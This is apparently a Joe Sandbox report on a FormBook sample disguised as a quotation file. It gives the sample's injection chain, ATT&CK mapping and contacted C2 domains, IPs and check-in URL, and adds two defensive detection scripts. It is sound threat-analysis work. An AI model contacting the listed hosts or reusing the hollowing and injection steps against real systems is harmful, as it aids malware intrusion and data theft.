          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
(The leading field of each memory-dump name is the report's process number in hex: 0000000A is process 10, the unpacked sample image at 0x400000; 0000000C is process 12.)

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

The matrix is reproduced here one tactic column per line. Digits after a technique are the report's signature-count markers for that technique; techniques without digits are the matrix's unmatched entries.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Shared Modules 1; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 31; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 5; Software Packing 3
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery 121; Process Discovery 2; Virtualization/Sandbox Evasion 31; Remote System Discovery 1; System Information Discovery 112; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 12; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; SIM Card Swap
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

Techniques with matched signatures, in summary: Shared Modules; Process Injection; Masquerading; Disable or Modify Tools; Virtualization/Sandbox Evasion; Deobfuscate/Decode Files or Information; Obfuscated Files or Information; Software Packing; Security Software Discovery; Process Discovery; Remote System Discovery; System Information Discovery; Archive Collected Data; Encrypted Channel; Ingress Tool Transfer; Non-Application Layer Protocol; Application Layer Protocol.

Behavior Graph

Behavior Graph ID: 458798
Sample: QUOTATION LIST FOR NEW ORDER.exe
Start date: 03/08/2021
Architecture: WINDOWS
Score: 100

Signatures on the sample node: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures.

Process tree as drawn in the graph. A number in square brackets after a process is the graph's created-files/registry-values counter; "injected" marks a process the graph shows as an injection target rather than a child process.

QUOTATION LIST FOR NEW ORDER.exe [3] (started)
    dropped: C:\...\QUOTATION LIST FOR NEW ORDER.exe.log, ASCII
    QUOTATION LIST FOR NEW ORDER.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
            network: www.quotovate.com 47.222.2.124, 80, SUDDENLINK-COMMUNICATIONSUS, United States; everesttechsolutions.com 204.11.58.233, 49704, 80, PUBLIC-DOMAIN-REGISTRYUS, United States; 2 other IPs or domains
            signature: System process connects to network (likely due to code injection or exploit)
            cmmon32.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe [1] (started)
                    conhost.exe (started)
    QUOTATION LIST FOR NEW ORDER.exe (started)

The top-level process launches two copies of its own image; the graph attributes the hollowing signatures and the explorer.exe injection to the first of them. Since explorer.exe is injected rather than spawned, a process-tree view alone will not link it to the sample: its network connections and the cmmon32.exe it starts are what expose it.
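The chain the graph records (sample spawns a copy of itself, the copy injects explorer.exe, explorer.exe beacons and starts cmmon32.exe, which starts cmd.exe) can be checked against process-creation and network telemetry. The script below is an added example written for this page, not code from the Joe Sandbox report; the event records, PIDs and image paths in it are constructed to mirror the graph (only the process names and the two IPs come from the report), and the set of injection-host utilities is an assumption limited to the one the report shows.

```python
"""Process-telemetry detection for the injection chain in the behavior graph.
Added example; not part of the Joe Sandbox report."""
import ntpath
from collections import defaultdict
from dataclasses import dataclass, field

# Windows utilities to treat as injection hosts. The report shows only
# cmmon32.exe; extend the set with whatever else you want to watch
# (assumption: this list is not taken from the report).
INJECTION_HOSTS = {"cmmon32.exe"}


@dataclass
class ProcEvent:
    """One process-creation record plus the connections the process made."""
    pid: int
    ppid: int
    image: str                                  # full image path
    net: list = field(default_factory=list)     # (dst_ip, dst_port) pairs


# Constructed telemetry mirroring the report's graph. PIDs and paths are
# made up; process names and destination IPs are the ones the report lists.
EVENTS = [
    ProcEvent(1000, 500, r"C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe"),
    ProcEvent(1010, 1000, r"C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe"),
    ProcEvent(1012, 1000, r"C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe"),
    # explorer.exe is an injection target, not a child of the sample, so it
    # keeps its normal parent; only its network activity gives it away.
    ProcEvent(2000, 800, r"C:\Windows\explorer.exe",
              net=[("47.222.2.124", 80), ("204.11.58.233", 80)]),
    ProcEvent(2100, 2000, r"C:\Windows\SysWOW64\cmmon32.exe"),
    ProcEvent(2110, 2100, r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(2111, 2110, r"C:\Windows\System32\conhost.exe"),
]


def _name(image):
    # ntpath so Windows paths split correctly on any host running the script
    return ntpath.basename(image).lower()


def analyze(events):
    """Return finding strings for the three behaviours the graph shows:
    self-spawn (hollowing prelude), the shell process beaconing, and the
    explorer.exe -> injection host -> cmd.exe chain."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)

    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = _name(e.image)

        # 1. A process launching a copy of its own image is the usual prelude
        #    to hollowing: the child is created suspended and its image is
        #    replaced before the primary thread runs.
        if parent is not None and parent.image.lower() == e.image.lower():
            findings.append(
                f"self-spawn: {name} pid={e.pid} ppid={e.ppid} (possible process hollowing)")

        # 2. The shell process making outbound connections is the report's
        #    'System process connects to network' signature.
        if name == "explorer.exe" and e.net:
            dsts = ", ".join(f"{ip}:{port}" for ip, port in e.net)
            findings.append(f"shell-beacon: explorer.exe pid={e.pid} connects to {dsts}")

        # 3. explorer.exe launching a rarely used Windows utility that in turn
        #    launches cmd.exe matches the injected-host chain in the graph.
        if (name in INJECTION_HOSTS and parent is not None
                and _name(parent.image) == "explorer.exe"):
            kids = {_name(c.image) for c in children[e.pid]}
            if "cmd.exe" in kids:
                findings.append(
                    f"injection-chain: explorer.exe -> {name} pid={e.pid} -> cmd.exe")
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

Rule 2 on its own is noisy on real endpoints (explorer.exe does talk to the network for legitimate reasons), which is why the three rules are reported separately: the self-spawn and the explorer.exe to cmmon32.exe to cmd.exe chain are the parts worth alerting on, with the beacon as corroboration.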


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label |
| QUOTATION LIST FOR NEW ORDER.exe | 61% | Virustotal | |
| QUOTATION LIST FOR NEW ORDER.exe | 46% | Metadefender | |
| QUOTATION LIST FOR NEW ORDER.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
| QUOTATION LIST FOR NEW ORDER.exe | 100% | Joe Sandbox ML | |

The ReversingLabs label names AgentTesla, but the Yara matches and the extracted configuration in this report identify FormBook. Family labels assigned to packed MSIL droppers are unreliable; record the configuration-based identification.

Dropped Files

No Antivirus matches

Unpacked PE Files

| Source | Detection | Scanner | Label |
| 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          Domains

          No Antivirus matches

URLs

Every entry below scored 0% and is labelled "safe" by the scanner named. All but the two "/p4se/" entries are truncated font-foundry strings carried in the font files' metadata (the trailing garbage such as "comd3" or "jp/xS" is where the string ran into adjacent memory); they are not URLs the sample requested.

| Source | Detection | Scanner | Label |
| http://www.fontbureau.comd3 | 0% | Avira URL Cloud | safe |
| http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
| http://www.carterandcone.comh-s | 0% | Avira URL Cloud | safe |
| http://www.fontbureau.comd: | 0% | Avira URL Cloud | safe |
| http://www.tiro.com | 0% | URL Reputation | safe |
| http://www.fontbureau.comessed | 0% | URL Reputation | safe |
| http://www.goodfont.co.kr | 0% | URL Reputation | safe |
| http://www.carterandcone.com | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/jp/: | 0% | Avira URL Cloud | safe |
| http://www.fontbureau.comldF | 0% | Avira URL Cloud | safe |
| http://www.sajatypeworks.com | 0% | URL Reputation | safe |
| http://www.typography.netD | 0% | URL Reputation | safe |
| http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/: | 0% | URL Reputation | safe |
| http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
| http://fontfabrik.com | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/3 | 0% | URL Reputation | safe |
| http://www.fontbureau.comW.TTFk | 0% | Avira URL Cloud | safe |
| http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
| http://www.fontbureau.com9 | 0% | Avira URL Cloud | safe |
| http://www.jiyu-kobo.co.jp/( | 0% | URL Reputation | safe |
| http://www.sandoll.co.kr | 0% | URL Reputation | safe |
| http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
| http://www.urwpp.de | 0% | URL Reputation | safe |
| http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
| http://www.fontbureau.como8 | 0% | Avira URL Cloud | safe |
| http://www.sakkal.com | 0% | URL Reputation | safe |
| http://www.fontbureau.com.TTF | 0% | URL Reputation | safe |
| http://www.fontbureau.comalsd | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/Y | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/Z | 0% | URL Reputation | safe |
| http://www.galapagosdesign.com/ | 0% | URL Reputation | safe |
| http://www.fontbureau.comF | 0% | URL Reputation | safe |
| http://www.agfamonotype. | 0% | URL Reputation | safe |
| http://www.tiro.comslnt | 0% | URL Reputation | safe |
| http://www.fontbureau.comcomd | 0% | URL Reputation | safe |
| http://www.carterandcone.comTC | 0% | URL Reputation | safe |
| http://www.galapagosdesign.com/staff/dennis.htmO; | 0% | Avira URL Cloud | safe |
| http://www.jiyu-kobo.co.jp/N | 0% | URL Reputation | safe |
| http://www.fontbureau.comY | 0% | Avira URL Cloud | safe |
| http://www.jiyu-kobo.co.jp/G | 0% | URL Reputation | safe |
| http://www.carterandcone.com-sQE1s/ | 0% | Avira URL Cloud | safe |
| http://www.jiyu-kobo.co.jp/xS | 0% | Avira URL Cloud | safe |
| http://www.fontbureau.comto | 0% | Avira URL Cloud | safe |
| http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe |
| http://www.fontbureau.coma | 0% | URL Reputation | safe |
| http://www.fontbureau.comd | 0% | URL Reputation | safe |
| www.appackersandmoversbengaluru.com/p4se/ | 0% | Avira URL Cloud | safe |
| http://www.fontbureau.comessed3 | 0% | Avira URL Cloud | safe |
| http://www.carterandcone.coml | 0% | URL Reputation | safe |
| http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/s | 0% | URL Reputation | safe |
| http://www.everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== | 0% | Avira URL Cloud | safe |
| http://www.jiyu-kobo.co.jp/r | 0% | URL Reputation | safe |
| http://www.fontbureau.comcomF | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/jp/( | 0% | URL Reputation | safe |
| http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
| http://www.fontbureau.como | 0% | URL Reputation | safe |
| http://www.fontbureau.comals | 0% | URL Reputation | safe |
| http://www.urwpp.dej | 0% | Avira URL Cloud | safe |
| http://www.galapagosdesign.com/( | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| www.quotovate.com | 47.222.2.124 | true | true | | unknown |
| everesttechsolutions.com | 204.11.58.233 | true | true | | unknown |
| www.tomio.tech | unknown | unknown | true | | unknown |
| www.everesttechsolutions.com | unknown | unknown | true | | unknown |

Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
| www.appackersandmoversbengaluru.com/p4se/ | true | Avira URL Cloud: safe | low |
| http://www.everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== | true | Avira URL Cloud: safe | unknown |

Both URLs are marked malicious on behavioural grounds (they were requested from the injected explorer.exe) while the reputation feed still rates them safe, and both share the "/p4se/" path across different hosts. Block on the behavioural verdict and the contacted-domain list above rather than waiting for the reputation feeds to catch up.
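The contacted-domain list and the one fully captured check-in URL above are enough to write a proxy-log check. The script below is an added example for this page, not code from the Joe Sandbox report: the log format and all log lines are constructed (only the first URL, the host names and the two IPs are taken from the report), the URL-shape regexes are derived from that single sample rather than from any published specification, and the score weights and threshold are assumptions.

```python
"""Proxy-log check for the check-in traffic listed in this report.
Added example; not part of the Joe Sandbox report."""
import re
from urllib.parse import urlsplit

# Hosts and IPs the report lists as contacted (the IOC set).
CONTACTED_HOSTS = {
    "www.quotovate.com",
    "everesttechsolutions.com",
    "www.everesttechsolutions.com",
    "www.tomio.tech",
    "www.appackersandmoversbengaluru.com",
}
CONTACTED_IPS = {"47.222.2.124", "204.11.58.233"}

# Shape of the captured check-in URL: one short path segment ("/p4se/") and
# a query of exactly two parameters whose values look base64-encoded. The
# length bounds are assumptions chosen to fit that sample.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,6}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{12,}={0,2}$")

# Constructed log lines: "<time> <client> <method> <url> <status> ua=<agent|->".
# The first URL is the one the report lists; the other three are made up.
LOG_LINES = [
    "2021-08-03T10:01:02Z 10.0.0.15 GET http://www.everesttechsolutions.com/p4se/"
    "?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== 200 ua=-",
    "2021-08-03T10:01:05Z 10.0.0.15 GET http://www.quotovate.com/p4se/"
    "?Qk7v=dGhpcyBpcyBhIHRlc3Q=&Hs9=YW5vdGhlciB0ZXN0IHZhbHVl 404 ua=-",
    "2021-08-03T10:02:00Z 10.0.0.22 GET http://www.fontbureau.com/designers/ 200 ua=Mozilla/5.0 (Windows NT 10.0)",
    "2021-08-03T10:02:30Z 10.0.0.22 GET http://example.com/ab12/"
    "?x=AAAAAAAAAAAAAAAA&y=BBBBBBBBBBBBBBBBBBBB 200 ua=Mozilla/5.0 (Windows NT 10.0)",
]


def score_request(url, user_agent):
    """Score one request: 3 for a known host/IP, 2 for the URL shape, 1 for a
    missing User-Agent (the report's 'HTTP GET or POST without a user agent'
    signature). Returns (score, reasons)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    score, reasons = 0, []
    if host in CONTACTED_HOSTS or host in CONTACTED_IPS:
        score += 3
        reasons.append(f"host {host} is in the report's contacted set")
    # Split the query by hand: parse_qsl would turn '+' into a space and
    # break the base64 check on values such as the one in the report.
    params = [p.split("=", 1) for p in parts.query.split("&") if p]
    if (PATH_RE.match(parts.path) and len(params) == 2
            and all(len(p) == 2 and B64_RE.match(p[1]) for p in params)):
        score += 2
        reasons.append("short path plus two base64-looking parameters")
    if user_agent in ("", "-"):
        score += 1
        reasons.append("no User-Agent header")
    return score, reasons


def scan(lines, threshold=3):
    """Return the log lines scoring at or above threshold, with the evidence."""
    hits = []
    for idx, line in enumerate(lines):
        _ts, client, _method, url, _status, ua_field = line.split(" ", 5)
        ua = ua_field[len("ua="):] if ua_field.startswith("ua=") else ua_field
        score, reasons = score_request(url, ua)
        if score >= threshold:
            hits.append({"line": idx, "client": client,
                         "host": urlsplit(url).hostname,
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

With the weights above, a known host alone is enough to flag a line, while the URL shape alone (the example.com line) is not; the shape and the missing User-Agent only add confidence or catch a rotated host that is not yet on the list.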

URLs from Memory and Binaries

| Name | Source | Malicious | Antivirus Detection | Reputation |
| http://www.fontbureau.com/designersG | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | | high |
| http://www.fontbureau.comd3 | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.fontbureau.com/designers/? | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | | high |
| http://www.founder.com.cn/cn/bThe | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.fontbureau.com/designers? | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | | high |
| http://www.carterandcone.comh-s | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.fontbureau.comd: | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.fontbureau.com/designersGN | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmp | false | | high |
| http://www.tiro.com | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.fontbureau.com/designers | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | | high |
| http://www.fontbureau.comessed | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.fontbureau.com/designersZ | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252531304.00000000059F1000.00000004.00000001.sdmp | false | | high |
| http://www.goodfont.co.kr | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.carterandcone.com | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247644835.00000000059F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.jiyu-kobo.co.jp/jp/: | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.fontbureau.comldF | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.sajatypeworks.com | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.typography.netD | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.founder.com.cn/cn/cThe | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.jiyu-kobo.co.jp/: | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://fontfabrik.com | explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.jiyu-kobo.co.jp/3 | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
| http://www.fontbureau.comW.TTFk | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.fontbureau.com/ | QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp | false | | high |
                                http://www.fontbureau.com/designersbQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255121412.00000000059F1000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com9QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fonts.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255135599.00000000059FA000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.como8QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252567447.00000000059D2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sakkal.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com.TTFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers6MQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253053283.00000000059F1000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.comalsdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/YQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000000.335006943.0000000006870000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/ZQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.galapagosdesign.com/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.257287203.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.agfamonotype.QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261422144.00000000059F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.tiro.comslntQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248396955.00000000059F2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comcomdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253506597.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.carterandcone.comTCQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmO;QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.258690188.00000000059C8000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/NQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comYQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252917416.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
